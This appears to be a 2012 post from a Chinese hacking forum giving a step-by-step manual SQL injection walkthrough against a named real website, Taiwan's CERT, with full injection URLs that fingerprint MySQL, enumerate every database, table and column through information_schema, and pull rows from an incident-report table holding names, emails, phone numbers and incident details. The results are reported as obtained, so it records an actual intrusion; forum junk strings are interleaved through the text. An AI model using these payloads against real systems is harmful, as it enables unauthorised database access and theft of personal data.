中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]

作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询! T5 d7 z8 O& d+ R8 g
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解* e4 w/ d! l! \% Z- u: Q: c& m( x& D4 c
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
8 |* ?4 \. S& P+ O  X0 x3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--" t' `6 H- C1 Z3 {0 d
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
' @% R. W' e0 H/ R; Q4.判断有没有写权限
$ u; f" b7 A# u8 d5 H8 T- Z( Vhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
" t' P4 o) o1 u7 s: X- Y没办法,手动猜表啦
1 s# e$ Y8 s$ `& d3 T. `$ A, n5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. p+ f# E; ?: B8 p. o% F4 @但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下& S2 L( c; h5 o, z, y: Q$ v
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ c# a! }2 P( o* |1 k( y5 W成功查出所有数据库,国外的黑客就是不一般。数据库如下:
1 Y: v; S) L) Y" H1 t! X2 jinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb+ k+ [; B6 v9 e- q# |) G1 p3 z+ B
6.爆表,爆的是twcert库& f) O) _7 g" M, J0 C; E
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--! F4 `" f8 {( [) e# U
爆出如下表) b$ e# t' f) e1 `4 j" r
downloadfile,irsys,newsdata,secrpt,secrpt_big56 K8 j( ^4 p% E& E7 G' Y& t
7.爆列名,这次爆的是irsys表
3 P0 k, o. _4 ~$ ?http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--' U" y2 G" p& W6 D0 S; W
爆出如下列
- u% k- g, h! u& ]" b, \2 }ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
1 d  L2 @! O( G4 D8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. R8 R0 j# X4 n. A  Phttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
8 z$ A) h& m6 ?返回是3,说明每个列里有3个地段
- b+ E/ i7 G( z. |* i: n9.爆字段内容
1 x) v$ O) r1 f8 w; D* @4 A4 ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
; p) M' \  m- w2 c爆出name列的第一个字段的内容. O% Y- V$ _! v  p; x; \
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
5 z1 j# C7 x0 m1 g6 S爆出name列的第二个字段的内容




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2